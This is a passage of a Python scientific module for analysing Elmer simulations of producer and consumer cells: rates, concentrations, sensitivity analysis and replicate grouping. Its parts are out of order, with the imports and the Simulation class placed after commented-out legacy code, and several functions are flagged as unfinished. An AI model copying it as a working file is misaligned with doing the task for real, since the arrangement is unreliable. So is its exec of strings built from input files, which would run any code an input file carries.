    def copy_event_list(self, simulation_results_file):
        """Replace this file's event list with another file's (shared, not
        deep-copied)."""
        self.remove_subresult(self.eventList)
        self.append_subresult(simulation_results_file.eventList)
        self.eventList = simulation_results_file.eventList
        self.events = simulation_results_file.events
    def set_event_list_header(self, header):
        """Overwrite the event-list CSV header."""
        self.eventList.header = header
        self.eventList.root.set('header', header)
    def add_event_list_column_name(self, column_name):
        """Append a column name to the header if not already present."""
        if self.is_event_list_column_name(column_name): return
        self.eventList.add_column_name(column_name)
    def is_event_list_column_name(self, column_name):
        """Return True if the header already contains this column."""
        return (column_name in self.get_event_list_column_names())
    def set_up_population(self, detail_level, grid_length, wrapping, bio_array):
        """Scale every event to the detail level, build its index ranges and
        stamp its mark into bio_array."""
        for event in self.events:
            event.apply_detail_level(detail_level)
            event.setup_ranges(grid_length, wrapping)
            event.stamp_bio_array(bio_array)
    def apply_detail_level(self, detail_level):
        """Scale every event's coordinates/index ranges to the detail level."""
        for event in self.events:
            event.apply_detail_level(detail_level)
    def setup_ranges(self, grid_length, wrapping):
        """(Re)build every event's grid index ranges."""
        for event in self.events:
            event.setup_ranges(grid_length, wrapping)
    def stamp_bio_array(self, bio_array):
        """Stamp every event's mark into the biomass array."""
        for event in self.events:
            event.stamp_bio_array(bio_array)
    def consumers(self):
        """Events with mark 2 (the consuming species)."""
        return [e for e in self.events if e.vars['mark'] == 2]
    def producers(self):
        """Events with mark 3 (the producing species)."""
        return [e for e in self.events if e.vars['mark'] == 3]
    def calc_rates_from_concn_array(self, concn_array, consume_rate,
                                        produce_rate, rate_array=None):
        """Compute every event's reaction rate and mean surface concentration
        from the nodal concentration field."""
        for event in self.events:
            event.calc_rate_from_concn_array(concn_array, consume_rate,
                                        produce_rate, rate_array=rate_array)
            event.calc_amean_surf_concn(concn_array)
    def set_concn_rate_results(self, concn_array, rate_array):
        """Store flux and concentration summary statistics on the
        <simulation>/<concn_rate> element."""
        # This doesn't take account of detail_level!
        # See update_concn_rate_results()
        calculated_flux = \
                    numpy.sum(numpy.absolute(rate_array))/2
        # Relative mass-balance error: production and consumption should
        # cancel, so |sum| over |flux| measures the imbalance.
        rel_diff = abs(numpy.sum(rate_array))/calculated_flux
        max_concn = numpy.max(concn_array)
        amean_concn = amean(concn_array)
        min_concn = numpy.min(concn_array)
        concn_rate = self.find('./simulation/concn_rate')
        if concn_rate is None:
            sim = self.find('./simulation')
            concn_rate = xmlTree.SubElement(sim, 'concn_rate')
        concn_rate.set('calculated_flux', str(calculated_flux))
        concn_rate.set('rel_diff', str(rel_diff))
        concn_rate.set('max_concn', str(max_concn))
        concn_rate.set('amean_concn', str(amean_concn))
        concn_rate.set('min_concn', str(min_concn))
    def update_concn_rate_results(self, detail_level):
        """Recompute flux/rel_diff from per-event rates (detail-level aware)."""
        # This is a bit of a fudge: set_concn_rate_results() implicitly assumes
        # detail_level = 1
        production = numpy.sum([e.vars['rate'] for e in self.producers()])
        consumption = numpy.sum([e.vars['rate'] for e in self.consumers()])
        calculated_flux = (production - consumption)/2
        rel_diff = abs(production + consumption)/calculated_flux
        concn_rate = self.find('./simulation/concn_rate')
        concn_rate.set('calculated_flux', str(calculated_flux))
        concn_rate.set('rel_diff', str(rel_diff))
    def get_amean_concn(self):
        """Arithmetic-mean concentration stored on <concn_rate>."""
        return float(self.find('.simulation/concn_rate').attrib['amean_concn'])
    def get_calculated_flux(self):
        """Total flux stored on <concn_rate>."""
        return float(self.find('.simulation/concn_rate').attrib['calculated_flux'])
    def get_relative_difference(self):
        """Mass-balance relative difference stored on <concn_rate>."""
        return float(self.find('.simulation/concn_rate').attrib['rel_diff'])
    def get_mean_surf_concn(self, cell_type='all', mean='amean'):
        """Return the chosen mean ('amean'/'gmean'/'hmean') of the per-cell
        surface concentrations over 'all', 'consumers' or 'producers'."""
        if cell_type == 'all':
            events = self.events
        elif cell_type == 'consumers':
            events = self.consumers()
        elif cell_type == 'producers':
            events = self.producers()
        if not mean in ['amean', 'gmean', 'hmean']:
            # Fixed: the error message previously named the wrong function.
            toolbox_basic.error_message(
                'toolbox_elmer.SimulationResultsFile.get_mean_surf_concn()',
                'mean not recognised: %s'%(mean))
        # Dict dispatch replaces the old Python-2-only 'exec' statement; an
        # unrecognised mean now raises KeyError (it previously raised at the
        # exec'd call site).
        mean_func = {'amean': amean, 'gmean': gmean, 'hmean': hmean}[mean]
        return mean_func([e.vars['amean_surf_concn'] for e in events])
class EventResult(toolbox_results.SingleCSVline):
    """One cell ('event') from an event list CSV row.

    self.vars holds the columns: 'mark' (2 = consumer, 3 = producer),
    continuous position 'x'/'y'(/'z'), and once apply_detail_level() has run,
    the half-open grid index ranges i_min..i_max etc. covered by the cell.
    """
    def __init__(self, header, text):
        toolbox_results.SingleCSVline.__init__(self, header, text)
    def apply_detail_level(self, detail_level):
        """Snap the cell centre onto the refined grid and record the
        half-open element index ranges it occupies (detail_level elements
        per side in each dimension)."""
        # If detail_level is odd:
        if (detail_level%2 == 1):
            # Odd: the cell is centred on one element, extended 'diff'
            # elements either side.
            diff = int((detail_level-1)/2)
            i_cen = int(self.vars['x'] * detail_level)
            self.vars['x'] = (i_cen+0.5)/detail_level
            self.vars['i_min'] = i_cen - diff
            self.vars['i_max'] = i_cen + diff + 1
            j_cen = int(self.vars['y'] * detail_level)
            self.vars['y'] = (j_cen+0.5)/detail_level
            self.vars['j_min'] = j_cen - diff
            self.vars['j_max'] = j_cen + diff + 1
            if 'z' in self.vars.keys():
                k_cen = int(self.vars['z'] * detail_level)
                self.vars['z'] = (k_cen+0.5)/detail_level
                self.vars['k_min'] = k_cen - diff
                self.vars['k_max'] = k_cen + diff + 1
        # If detail_level is even:
        else:
            # Even: the cell is centred on a grid node, so the range is
            # symmetric about it with no central element.
            diff = int(detail_level/2)
            i_cen = int(round(self.vars['x'] * detail_level))
            self.vars['x'] = i_cen/detail_level
            self.vars['i_min'] = i_cen - diff
            self.vars['i_max'] = i_cen + diff
            j_cen = int(round(self.vars['y'] * detail_level))
            self.vars['y'] = j_cen/detail_level
            self.vars['j_min'] = j_cen - diff
            self.vars['j_max'] = j_cen + diff
            if 'z' in self.vars.keys():
                k_cen = int(round(self.vars['z'] * detail_level))
                self.vars['z'] = k_cen/detail_level
                self.vars['k_min'] = k_cen - diff
                self.vars['k_max'] = k_cen + diff
    def setup_ranges(self, grid_length, wrapping):
        """Materialise self.i_range/j_range(/k_range) from the stored min/max
        indices, either wrapped modulo grid_length or clipped to the domain.

        NOTE(review): the non-wrapping clip keeps index grid_length itself
        (<=), one past the last element index — confirm this is intended.
        """
        # Take care of any edge effects:
        i_range = range(self.vars['i_min'], self.vars['i_max'])
        j_range = range(self.vars['j_min'], self.vars['j_max'])
        if 'z' in self.vars.keys():
            k_range = range(self.vars['k_min'], self.vars['k_max'])
        if wrapping:
            self.i_range = [i%grid_length for i in i_range]
            self.j_range = [j%grid_length for j in j_range]
            if 'z' in self.vars.keys():
                self.k_range = [k%grid_length for k in k_range]
        else:
            self.i_range = [i for i in i_range if i >= 0 and i <= grid_length]
            self.j_range = [j for j in j_range if j >= 0 and j <= grid_length]
            if 'z' in self.vars.keys():
                self.k_range = [k for k in k_range if k>=0 and k<=grid_length]
    def stamp_bio_array(self, bio_array):
        """Write this cell's mark into every grid element it covers."""
        for i in self.i_range:
            for j in self.j_range:
                if 'z' in self.vars.keys():
                    for k in self.k_range:
                        bio_array[i][j][k] = self.vars['mark']
                else:
                    bio_array[i][j] = self.vars['mark']
    def calc_rate_from_concn_array(self, concn_array, consume_rate,
                                        produce_rate, rate_array=None):
        """Average the kinetic rate over the cell's elements (each element's
        rate is the mean of its four corner-node rates); store it in
        vars['rate'] and optionally per-element in rate_array."""
        self.vars['rate'] = 0.0
        if self.vars['mark'] == 2: kinetic_rate = consume_rate
        else: kinetic_rate = produce_rate
        counter = 0
        for (i, j) in [(i, j) for i in self.i_range for j in self.j_range]:
            concns = [concn_array[I][J] for I in [i, i+1] for J in [j, j+1]]
            rates = [kinetic_rate(concn) for concn in concns]
            mean_rate = numpy.mean(rates)
            # NOTE(review): 'not rate_array == None' is ambiguous for
            # ndarrays under modern NumPy; relies on old-NumPy behaviour.
            if not rate_array == None:
                rate_array[i][j] = mean_rate
            self.vars['rate'] += mean_rate
            counter += 1
        self.vars['rate'] /= counter
        return self.vars['rate']
    def calc_amean_surf_concn(self, concn_array):
        """Arithmetic mean of the concentration at the nodes on the cell's
        perimeter; stored in vars['amean_surf_concn']. 2-D only (uses
        i_range/j_range)."""
        surface_nodes = [(i, self.j_range[0]) for i in self.i_range] + \
                        [(i, self.j_range[-1]+1) for i in self.i_range] + \
                        [(self.i_range[0], j) for j in self.j_range[1:]] + \
                        [(self.i_range[-1]+1, j) for j in self.j_range+[self.j_range[-1]+1]]
        concns = [concn_array[i][j] for (i, j) in surface_nodes]
        self.vars['amean_surf_concn'] = numpy.mean(concns)
        return self.vars['amean_surf_concn']
    def position(self):
        """(x, y) or (x, y, z) tuple of the cell centre."""
        if 'z' in self.vars.keys():
            return (self.vars['x'], self.vars['y'], self.vars['z'])
        else:
            return (self.vars['x'], self.vars['y'])
class AnalyticApproach:
    """Well-mixed (mean-field) approximation of the producer/consumer system.

    A producers (parameters qmaxA, pmax, kA) make product that B consumers
    (qmaxB, pmin, kB) remove; calc_equal_concn() finds the concentration at
    which total production equals total consumption.
    """
    def __init__(self):
        # Producer species A: count, max rate, max product concn, half-sat.
        self.A = 1
        self.qmaxA = 1.0
        self.pmax = 10.0
        self.kA = 1.0
        # Consumer species B: count, max rate, min product concn, half-sat.
        self.B = 1
        self.qmaxB = 1.0
        self.pmin = 0.1
        self.kB = 1.0
    def set_parameters(self, A=None, qmaxA=None, pmax=None, kA=None,
                                B=None, qmaxB=None, pmin=None, kB=None):
        """Update any subset of the parameters; None leaves a value as-is."""
        self.A = self.A if A is None else A
        self.qmaxA = self.qmaxA if qmaxA is None else qmaxA
        self.pmax = self.pmax if pmax is None else pmax
        self.kA = self.kA if kA is None else kA
        self.B = self.B if B is None else B
        self.qmaxB = self.qmaxB if qmaxB is None else qmaxB
        self.pmin = self.pmin if pmin is None else pmin
        self.kB = self.kB if kB is None else kB
    def production(self, p):
        """Total production rate by species A at product concentration p."""
        return self.A*self.qmaxA*(self.pmax-p)/(self.pmax+self.kA+p)
    def calc_equal_concn(self):
        """Return the concentration where production equals consumption:
        the larger root of the quadratic q2*p**2 + q1*p + q0 = 0 obtained
        by equating the two rate expressions."""
        qmaxAA, qmaxBB = self.qmaxA*self.A, self.qmaxB*self.B
        q2 = qmaxAA + qmaxBB
        q1 = qmaxAA*(self.kB + self.pmin - self.pmax) \
                    + qmaxBB*(self.kA + self.pmax - self.pmin)
        q0 = - qmaxBB*self.kA*self.pmin \
                    - qmaxAA*self.kB*self.pmax - q2*self.pmax*self.pmin
        roots = numpy.roots([q2, q1, q0])
        p = max(roots)
        return p
    def calc_equal_concn_rate(self):
        """Production rate at the equal-rate (equilibrium) concentration."""
        p = self.calc_equal_concn()
        return self.production(p)
    def sensitivity_analysis(self, cv=0.1, return_rate=False, return_diffs=True):
        """Vary all eight parameters over {1-cv, 1, 1+cv} multipliers
        (full 3**8 factorial grid) and report the spread of the equilibrium
        concentration (or rate, if return_rate).

        Returns (norm - min, max - norm) if return_diffs, else (min, max).
        Parameters are restored to their nominal values afterwards.
        """
        from itertools import product
        params = (self.A, self.qmaxA, self.pmax, self.kA,
                        self.B, self.qmaxB, self.pmin, self.kB)
        if return_rate:
            norm_val = self.calc_equal_concn_rate()
        else:
            norm_val = self.calc_equal_concn()
        max_val, min_val = norm_val, norm_val
        cv_range = [(1-cv), 1, (1+cv)]
        # itertools.product replaces the original eight nested for-loops;
        # the set of parameter combinations visited is identical.
        for a, qa, px, ka, b, qb, pn, kb in product(cv_range, repeat=8):
            self.set_parameters(A=a*params[0],
                                qmaxA=qa*params[1],
                                pmax=px*params[2],
                                kA=ka*params[3],
                                B=b*params[4],
                                qmaxB=qb*params[5],
                                pmin=pn*params[6],
                                kB=kb*params[7])
            if return_rate:
                val = self.calc_equal_concn_rate()
            else:
                val = self.calc_equal_concn()
            max_val = max(max_val, val)
            min_val = min(min_val, val)
        # Restore the nominal parameter values.
        self.set_parameters(A=params[0], qmaxA=params[1], pmax=params[2],
                            kA=params[3], B=params[4], qmaxB=params[5],
                            pmin=params[6], kB=params[7])
        if return_diffs:
            minus_diff = norm_val - min_val
            plus_diff = max_val - norm_val
            return minus_diff, plus_diff
        else:
            return min_val, max_val
class SimCollection:
    """A group of Simulation objects that share the same setup.

    The first simulation fixes the reference attributes (space geometry,
    population sizes, random seed); further simulations are admitted by
    add_if_belongs() when they match in every attribute not explicitly
    allowed to differ.
    """
    # The attributes that decide whether two simulations belong together.
    _match_attrs = ('wrapping', 'side_length', 'is_3d',
                    'consumers', 'producers', 'random_seed')
    def __init__(self, simulation):
        """Accept a single Simulation or a non-empty list of them; the
        first one supplies the reference attributes."""
        if isinstance(simulation, list):
            self.simulations = simulation
            simulation = self.simulations[0]
        else:
            self.simulations = [simulation]
        self.wrapping = simulation.wrapping
        self.side_length = simulation.side_length
        self.is_3d = simulation.is_3d
        self.consumers = simulation.consumers
        self.producers = simulation.producers
        self.random_seed = simulation.random_seed
    def add_if_belongs(self, simulation, diffs_allowed=None):
        """Append simulation if it matches the reference attributes.

        diffs_allowed lists attribute names permitted to differ
        (default: only 'random_seed').  Returns True when added.
        Fixes in this version: mutable default argument replaced by the
        None sentinel; unused 'comparitor' local removed; the six
        copy-pasted comparisons collapsed into one loop.
        """
        if diffs_allowed is None:
            diffs_allowed = ['random_seed']
        for attr in self._match_attrs:
            if attr in diffs_allowed:
                continue
            if getattr(simulation, attr) != getattr(self, attr):
                return False
        self.simulations.append(simulation)
        return True
    def get_calculated_fluxes(self, detail_level, sif_name):
        """Calculated flux from each member's run results."""
        out = []
        for sim in self.simulations:
            rf = sim.get_run_results(detail_level, sif_name)
            if detail_level > 1:
                # Totals stored at write time assume detail_level 1.
                rf.update_concn_rate_results(detail_level)
            out.append(rf.get_calculated_flux())
        return out
    def get_amean_concns(self, detail_level, sif_name):
        """Arithmetic-mean concentration from each member's results."""
        return \
            [sim.get_run_results(detail_level, sif_name).get_amean_concn() \
                                            for sim in self.simulations]
    def estimates_from_concn(self, detail_level, sif_name, D, pmin,
                                                    dist_mean='amean'):
        """Flux estimate per member from the bulk concentration, the
        diffusivity D, the consumers' minimum concentration pmin and the
        mean nearest-neighbour distance."""
        sides = 6 if self.is_3d else 4
        estimates = []
        for sim in self.simulations:
            p = sim.get_amean_concn(detail_level, sif_name)
            d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
            estimates.append(D*self.producers*sides*(p-pmin)/d)
        return estimates
    def estimates_from_surf_concn(self, detail_level, sif_name, D,
                                                    dist_mean='amean'):
        """Flux estimate per member from cell-surface concentrations of
        producers and consumers and the mean nearest-neighbour distance."""
        sides = 6 if self.is_3d else 4
        estimates = []
        for sim in self.simulations:
            pmin = sim.get_mean_surf_concn(detail_level, sif_name,
                                    cell_type='consumers', mean='amean')
            pmax = sim.get_mean_surf_concn(detail_level, sif_name,
                                    cell_type='producers', mean='amean')
            d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
            estimates.append(D*self.producers*sides*(pmax-pmin)/d)
        return estimates
def find_sim_collections(results_dir, diffs_allowed=None):
    """Group the replicate simulations under results_dir into
    SimCollections of matching setups.

    diffs_allowed lists attribute names allowed to differ within one
    collection (default: only 'random_seed').

    Fixes in this version: diffs_allowed was previously accepted but
    never forwarded to add_if_belongs(), so non-default values were
    silently ignored; the mutable default and '== None' are gone too.
    """
    if diffs_allowed is None:
        diffs_allowed = ['random_seed']
    sim_collections = []
    for sim in get_replicate_simulations(results_dir):
        home = None
        for sc in sim_collections:
            if sc.add_if_belongs(sim, diffs_allowed=diffs_allowed):
                home = sc
                break
        if home is None:
            sim_collections.append(SimCollection(sim))
    return sim_collections
def wrap_points(points, side_length, num_wraps=1, is_3d=False):
    """Tile points across periodic boundaries.

    points : numpy array of coordinate rows (2 or 3 columns).
    side_length : positive real (usually integer) domain length.
    num_wraps : how many domain widths to tile in each direction.

    Returns a numpy array containing every point shifted by all
    combinations of multiples of side_length in [-num_wraps, num_wraps].
    """
    offsets = [k * side_length for k in range(num_wraps + 1)]
    offsets += [-o for o in offsets[1:]]
    if is_3d:
        tiled = [p + (dx, dy, dz)
                 for p in points
                 for dx in offsets for dy in offsets for dz in offsets]
    else:
        tiled = [p + (dx, dy)
                 for p in points
                 for dx in offsets for dy in offsets]
    return numpy.array(tiled)
def every_cell_spatial_stats(root_dir, detail_level=1):
    """Attach Delaunay neighbourhood counts to every cell event.

    Builds a Delaunay triangulation of all cell positions (tiled across
    periodic boundaries when the domain wraps) and stores each event's
    neighbour count as 'eDT_nnbs'.

    NOTE(review): this function looks unfinished - 'nb_points' is
    computed but never used, the results file is never written back, and
    a module-level get_detail_level_results() is called that is not
    defined at module scope in this file; confirm before use.
    """
    results_file = get_detail_level_results(root_dir, detail_level=detail_level)
    results_file.get_space_parameters()
    points = numpy.array([e.position() for e in results_file.events])
    if results_file.wrapping:
        # Tile across the periodic boundaries so edge cells get their
        # true neighbours rather than hull artefacts.
        points = wrap_points(points, results_file.side_length,
                                                is_3d=results_file.is_3d)
    triangulation = Delaunay(points)
    # CSR-style neighbour structure: indices gives each vertex's slice
    # into indptr.
    indices, indptr = triangulation.vertex_neighbor_vertices
    for event in results_file.events:
        e_point = numpy.array(event.position())
        row_number = toolbox_basic.find_index_of_row_in_array(points, e_point)
        # Number of Delaunay neighbours (+1 - presumably to count the
        # cell itself; TODO confirm the intended convention).
        event.vars['eDT_nnbs'] = indices[row_number+1] - indices[row_number] +1
        neighbor_indices = indptr[indices[row_number]:indices[row_number+1]]
        nb_points = [points[i] for i in neighbor_indices]
def get_replicate_results(replicates_dir):
    """Open the 'results.xml' summary file of a replicates directory."""
    checked_dir = toolbox_basic.check_path(replicates_dir)
    xml_path = os.path.join(checked_dir, 'results.xml')
    return ReplicatesFile(path=xml_path)
def get_replicate_simulations(replicates_dir):
    """One Simulation per immediate subdirectory of replicates_dir."""
    subdirs = toolbox_basic.subdir_list(replicates_dir)
    return [Simulation(subdir) for subdir in subdirs]
def setup_replicate_results(replicates_dir):
    """Initialise the replicates results file with the shared space
    parameters and write it to disk.

    The first replicate defines the reference geometry; if any other
    replicate disagrees on wrapping, dimensionality or side length, an
    error is reported and the interpreter exits (as in the original).
    """
    results_file = get_replicate_results(replicates_dir)
    replicate_simulations = get_replicate_simulations(replicates_dir)
    wrapping = replicate_simulations[0].wrapping
    is_3d = replicate_simulations[0].is_3d
    side_length = replicate_simulations[0].side_length
    results_file.set_space_parameters(wrapping=wrapping, is_3d=is_3d,
                                                side_length=side_length)
    for sim in replicate_simulations:
        if not ((sim.wrapping == wrapping) and
                (sim.is_3d == is_3d) and
                (sim.side_length == side_length)):
            # Error message fixed: it previously named a nonexistent
            # 'get_replicates_results()' function.
            toolbox_basic.error_message(
                'toolbox_elmer.setup_replicate_results():'+
                'Replicates have different space parameters', replicates_dir)
            exit()
    results_file.write()
    return results_file
def get_replicate_results_basics(replicates_dir,
                        detail_level=1, sif_name='elmer_standard'):
    """Set up replicate results for a detail level / solver input file.

    NOTE(review): this function looks unfinished - the locals
    'replicate_simulations', 'dl_resuls' (sic, typo kept) and
    'sif_results' are computed but never used, and the loop over
    replicates is commented out.  Only the write() has any effect.
    """
    replicate_simulations = get_replicate_simulations(replicates_dir)
    results_file = setup_replicate_results(replicates_dir)
    dl_resuls = results_file.get_detail_level_results(detail_level=detail_level)
    sif_results = results_file.get_solver_input_file_results(
                            detail_level=detail_level, sif_name=sif_name)
    #for sim in replicate_simulations:
    results_file.write()
def hydrogen_logo(axis, bottom_left=(0.9, 0.9), height_width=0.1):
    """Draw a small H2-molecule logo (two bonded grey circles) on axis.

    bottom_left and height_width are in axes coordinates; the two atoms
    sit in the top-left and bottom-right corners of the square box.
    """
    color = '0.5'
    circle = toolbox_schematic.Circle()
    circle.set_defaults(edgecolor='none', facecolor=color, transform=True)
    radius = 0.2*height_width
    center_A = (bottom_left[0] + radius, bottom_left[1] + height_width - radius)
    center_B = (bottom_left[0] + height_width - radius, bottom_left[1] + radius)
    circle.set_points(center_A, radius)
    circle.draw(axis)
    circle.set_points(center_B, radius)
    circle.draw(axis)
    # (Removed a leftover Python 2 debug 'print' of the two centres,
    # which wrote to stdout on every call.)
    # The bond between the two atoms.
    axis.plot([center_A[0], center_B[0]], [center_A[1], center_B[1]], color, linestyle='-', transform=axis.transAxes)
    #center = ((bottom_left[0]+top_right[0])/2, (bottom_left[1]+top_right[1])/2)
'''
def get_combined_results(root_dir, detail_level=1, sif_name='elmer_standard'):
dl_results = get_detail_level_results(root_dir, detail_level=detail_level)
run_results = get_run_results(root_dir,
detail_level=detail_level, sif_name=sif_name)
for e in run_results.events:
for o in dl_results.events:
if o.position() == e.position():
for attrib in o.vars.keys():
e.vars[attrib] = o.vars[attrib]
run_results.set_read_only()
return run_results
'''
'''
def get_rate_array(root_dir, detail_level=1, sif_name='elmer_standard'):
run_dir = get_run_dir(root_dir,detail_level=detail_level,sif_name=sif_name)
array_path = os.path.join(run_dir, 'rate_array.npy')
array_path = toolbox_basic.check_path(array_path)
array = numpy.load(array_path)
return array
'''
'''
def calc_nearest_neighbor_distances(root_dir, detail_level=1):
simulation = Simulation(root_dir)
results_file = simulation.get_detail_level_results(detail_level)
#if ('eNN_dist' in results_file.get_eventList_column_names()): return
if results_file.is_event_list_column_name('eNN_dist'): return
#results_file.set_space_parameters()
cons_points = numpy.array([e.position() for e in results_file.consumers()])
prod_points = numpy.array([e.position() for e in results_file.producers()])
if simulation.wrapping:
cons_points = wrap_points(cons_points, simulation.side_length,
is_3d=simulation.is_3d)
prod_points = wrap_points(prod_points, simulation.side_length,
is_3d=simulation.is_3d)
cons_tree = KDTree(cons_points)
prod_tree = KDTree(prod_points)
for e in results_file.events:
c_dist, id = cons_tree.query(e.position())
p_dist, id = prod_tree.query(e.position())
e.vars['sNN_dist'] = c_dist if (e.vars['mark'] == 2) else p_dist
e.vars['oNN_dist'] = c_dist if (e.vars['mark'] == 3) else p_dist
e.vars['eNN_dist'] = min(c_dist, p_dist)
results_file.add_event_list_column_name('eNN_dist')
results_file.add_event_list_column_name('oNN_dist')
results_file.add_event_list_column_name('sNN_dist')
results_file.eventList.update_text()
results_file.write()
'''
#!/usr/bin/python
from __future__ import division
from __future__ import with_statement
import math
import matplotlib
from matplotlib import pyplot
from mpl_toolkits.axes_grid1 import make_axes_locatable
import numpy
from numpy import mean as amean
import os
import re
from scipy.spatial import Delaunay
from scipy.spatial import KDTree
from scipy.stats.mstats import gmean as gmean
from scipy.stats.mstats import hmean as hmean
import toolbox_basic
import toolbox_plotting
import toolbox_results_new as toolbox_results
import toolbox_schematic
import xml.etree.ElementTree as xmlTree
class Simulation:
    """One simulation output directory and its derived Elmer solver runs.

    Reads the domain (wrapping, side length, 2D/3D), the two cell
    populations (mark 2 = consumers, other marks = producers) and the
    random seed from the protocol file.  Meshes, solver input files
    (.sif), cached concentration/rate arrays and per-cell result files
    are managed under 'detail_level_<n>/<sif_name>/' subdirectories.
    """
    def __init__(self, root_dir, find_protocol=True):
        """Store the run directory and, unless find_protocol is False,
        parse its protocol file for space and population parameters."""
        self.root_dir = toolbox_basic.check_path(root_dir)
        if not find_protocol: return
        # Set up the space from the protocol file.
        protocol_path = toolbox_basic.find_protocol_file_path(self.root_dir)
        self.protocol_tree = toolbox_basic.get_xml_tree(protocol_path)
        space_params = self.protocol_tree.findall('./space/param')
        for param in space_params:
            name, text = param.attrib['name'], param.text
            if name == 'wrapping': self.wrapping = (text == 'true')
            elif name == 'length': self.side_length = int(float(text))
            elif name == 'nDims': self.is_3d = (int(float(text)) == 3)
        # Population sizes: mark value 2 denotes consumers, any other
        # mark is counted as producers.
        marks = self.protocol_tree.findall('./mark')
        for mark in marks:
            for param in mark:
                if param.attrib['name'] == 'value':
                    value = int(param.text)
                if param.attrib['name'] == 'number':
                    number = int(param.text)
            if value == 2:
                self.consumers = number
            else:
                self.producers = number
        rs = self.protocol_tree.find("./process/param[@name='randomSeed']")
        self.random_seed = int(rs.text)
    def copy_mesh_files(self, detail_level, sif_name):
        """Copy the detail-level mesh into the given solver run directory."""
        self.get_detail_level_mesh_dir(detail_level)
        run_dir = self.get_run_dir(detail_level, sif_name)
        run_mesh_dir = os.path.join(run_dir, 'mesh')
        toolbox_basic.copy_dir(self.detail_level_mesh_dir, run_mesh_dir)
    def get_concn_array(self, detail_level, sif_name):
        """Return the nodal concentration array for a run, caching it.

        On first use, reads the last (grid_length+1)**2 lines of Elmer's
        'case.result' and saves them as 'concn_array' in the run dir.
        """
        self.get_run_dir(detail_level, sif_name)
        grid_length = detail_level * self.side_length
        array_path = os.path.join(self.run_dir, 'concn_array')
        if os.path.isfile(array_path):
            concn_array = toolbox_basic.load_array(array_path)
        else:
            result_file_path = os.path.join(self.run_dir, 'case.result')
            result_file_path = toolbox_basic.check_path(result_file_path)
            # This isn't quite correct! Without wrapping, Elmer skips some nodes
            num_nodes = (grid_length + 1)**2
            array_shape = (grid_length + 1,)*2
            with open(result_file_path, 'Ur') as f:
                last_lines = f.readlines()[-num_nodes:]
            concn_array = numpy.array([float(line) for line in last_lines])
            concn_array = numpy.reshape(concn_array, array_shape)
            toolbox_basic.save_array(concn_array, array_path)
        return concn_array
    def get_consume_produce_functions(self, detail_level, sif_name):
        """Build Python rate functions from the MATC kinetics in the .sif.

        Parses the '$ function consume'/'$ function produce' lines and
        returns (consume_rate, produce_rate), each a function of the
        local concentration c; consume_rate is <= 0, produce_rate >= 0.
        """
        self.get_sif_file_path(detail_level, sif_name)
        with open(self.sif_file_path) as f:
            lines = f.readlines()
        regex = re.compile('\$ function consume.*')
        cons_line = [line for line in lines if re.match(regex, line)][0]
        min_index = cons_line.index('min(0.0')
        close_index = cons_line.index(') }')
        consume_rate = 'def consume_rate(c):\n\treturn min(0.0, %s)' \
                                    %(cons_line[min_index+8:close_index])
        regex = re.compile('\$ function produce.*')
        prod_line = [line for line in lines if re.match(regex, line)][0]
        min_index = prod_line.index('max(0.0')
        close_index = prod_line.index(') }')
        produce_rate = 'def produce_rate(c):\n\treturn max(0.0, %s)' \
                                    %(prod_line[min_index+8:close_index])
        # exec into an explicit namespace: portable to Python 3, where
        # the bare 'exec' statement (and rebinding locals) is invalid.
        namespace = {}
        exec(consume_rate, namespace)
        exec(produce_rate, namespace)
        return namespace['consume_rate'], namespace['produce_rate']
    def get_detail_level_dir(self, detail_level):
        """Return (creating if needed) 'detail_level_<n>' under root."""
        name = 'detail_level_%d'%(detail_level)
        self.detail_level_dir = os.path.join(self.root_dir, name)
        toolbox_basic.make_dir(self.detail_level_dir)
        return self.detail_level_dir
    def get_detail_level_mesh_dir(self, detail_level):
        """Return (creating if needed) the mesh dir of a detail level."""
        self.get_detail_level_dir(detail_level)
        self.detail_level_mesh_dir = os.path.join(self.detail_level_dir, 'mesh')
        toolbox_basic.make_dir(self.detail_level_mesh_dir)
        return self.detail_level_mesh_dir
    def get_detail_level_results(self, detail_level, read_only=False):
        """Open the 'cell_locations.xml' results file of a detail level."""
        self.get_detail_level_dir(detail_level)
        cells_path = os.path.join(self.detail_level_dir, 'cell_locations.xml')
        cells_file = SimulationResultsFile(path=cells_path, read_only=read_only)
        return cells_file
    def get_combined_results(self, detail_level, sif_name):
        """Merge location attributes into the run (rates) results.

        NOTE: O(n^2) position matching; acceptable for the population
        sizes used here.
        """
        dl_results = self.get_detail_level_results(detail_level, read_only=True)
        run_results = self.get_run_results(detail_level, sif_name, read_only=True)
        for e in run_results.events:
            for o in dl_results.events:
                if o.position() == e.position():
                    for attrib in o.vars.keys():
                        e.vars[attrib] = o.vars[attrib]
        return run_results
    def get_rate_array(self, detail_level, sif_name):
        """Return the per-grid-cell rate array, computing it if absent."""
        self.get_run_dir(detail_level, sif_name)
        array_path = os.path.join(self.run_dir, 'rate_array')
        if not os.path.isfile(array_path):
            # Generating the run results also writes 'rate_array'.
            self.get_run_results(detail_level, sif_name)
        return toolbox_basic.load_array(array_path)
    def get_run_results(self, detail_level, sif_name, read_only=False):
        """Open 'cell_rates.xml' for a run, generating it on first use.

        Generation evaluates the .sif kinetics on the cached
        concentration array, writes the rate array and the summary
        statistics, then saves the file.
        """
        self.get_run_dir(detail_level, sif_name)
        rates_path = os.path.join(self.run_dir, 'cell_rates.xml')
        rates_file = SimulationResultsFile(path=rates_path, read_only=read_only)
        if rates_file.events == []:
            grid_length = self.side_length * detail_level
            rates_file = self.get_detail_level_results(detail_level)
            rates_file.path = rates_path
            rates_file.setup_ranges(grid_length, self.wrapping)
            # 'float' replaces the deprecated numpy.float alias.
            rate_array = numpy.zeros((grid_length,)*2, dtype=float)
            concn_array = self.get_concn_array(detail_level, sif_name)
            consume_rate, produce_rate = \
                        self.get_consume_produce_functions(detail_level, sif_name)
            rates_file.calc_rates_from_concn_array(concn_array, consume_rate,
                                        produce_rate, rate_array=rate_array)
            array_path = os.path.join(self.run_dir, 'rate_array')
            toolbox_basic.save_array(rate_array, array_path)
            head = 'mark,x,y'
            if self.is_3d: head += ',z'
            head += ',rate,amean_surf_concn'
            rates_file.set_event_list_header(head)
            rates_file.set_concn_rate_results(concn_array, rate_array)
            rates_file.write()
        return rates_file
    def get_run_dir(self, detail_level, sif_name):
        """Return (creating if needed) the run dir for a .sif name."""
        self.get_detail_level_dir(detail_level)
        self.run_dir = os.path.join(self.detail_level_dir, sif_name)
        toolbox_basic.make_dir(self.run_dir)
        return self.run_dir
    def get_sif_file_path(self, detail_level, sif_name):
